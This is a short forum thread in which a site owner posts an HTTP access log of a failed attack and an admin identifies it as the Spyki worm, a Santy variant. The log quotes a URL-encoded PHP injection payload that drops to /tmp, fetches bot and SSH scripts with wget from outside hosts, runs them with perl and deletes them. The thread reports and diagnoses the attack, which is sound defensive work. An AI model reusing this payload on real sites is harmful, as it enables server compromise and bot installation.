Welcome to Geeklog, Anonymous Wednesday, December 25 2024 @ 08:16 pm EST

Geeklog Forums

Lame Hacking Attempt


Status: offline

ByteEnable

Forum User
Full Member
Registered: 10/20/03
Posts: 138
Below is an http access log of someone attempting to hack my site, LinuxElectrons.com. The attempt fails, but someone is attempting. There is no variable that I know of named "rush", so of course it fails. But I thought I would post it here for the expert eyes like Dirk.

Text Formatted Code

66.98.220.74 - - [18/Jan/2005:21:48:07 -0600] "GET /article.php/2004122910234777&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.not
es/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%7
0%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 111 "-" "LWP
::Simple/5.803"


 
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
This is "Spyki" worm, the newer variant of the original "Santy" worm. See my post here.

No problem for Geeklog, just a nuisance ...

bye, Dirk
 Quote

All times are EST. The time is now 08:16 pm.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content